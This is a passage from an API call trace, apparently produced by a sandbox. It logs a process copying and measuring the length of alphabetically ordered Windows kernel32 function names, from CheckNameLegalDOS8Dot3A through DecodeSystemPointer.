returned="CheckNameLegalDOS8Dot3A" [0085.855] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.855] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.855] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.855] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.855] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.856] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.856] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.856] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.856] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.856] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.856] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.856] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.856] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.856] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.856] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.856] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.856] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.856] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.856] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.856] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.856] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.856] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.856] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.856] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.856] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.857] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.857] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.857] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.857] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.857] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.857] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.857] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.857] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.857] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.857] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.857] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.857] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.857] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.857] lstrlenA (lpString="COPYFILEA") returned 9 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.857] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.857] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.857] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.857] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.857] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.858] lstrlenA (lpString="COPYFILEW") returned 9 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.858] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.858] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.858] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.858] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.858] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.858] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.858] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.858] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.858] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.858] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.858] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.858] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.858] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.858] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.858] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.858] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.858] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.858] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.858] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.859] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.859] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.859] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.859] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.859] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.859] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.859] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.859] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.859] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.859] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.859] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.859] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.860] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.860] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.860] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.860] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.860] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.860] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.860] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.860] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.860] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.860] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.860] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.860] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.860] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.860] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.860] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.860] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.860] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.860] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.860] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.860] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.861] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.861] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.861] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.861] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.861] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.861] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.861] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.861] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.861] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.861] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.861] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.861] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.861] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.861] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.861] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.861] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.861] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.861] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.861] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.862] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.862] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.862] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.862] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.862] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.862] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.862] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.862] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.862] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.862] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.862] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.862] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.862] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.862] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.862] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.862] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.862] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.862] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.862] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.862] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.863] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.863] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.863] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.863] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.863] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.863] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, 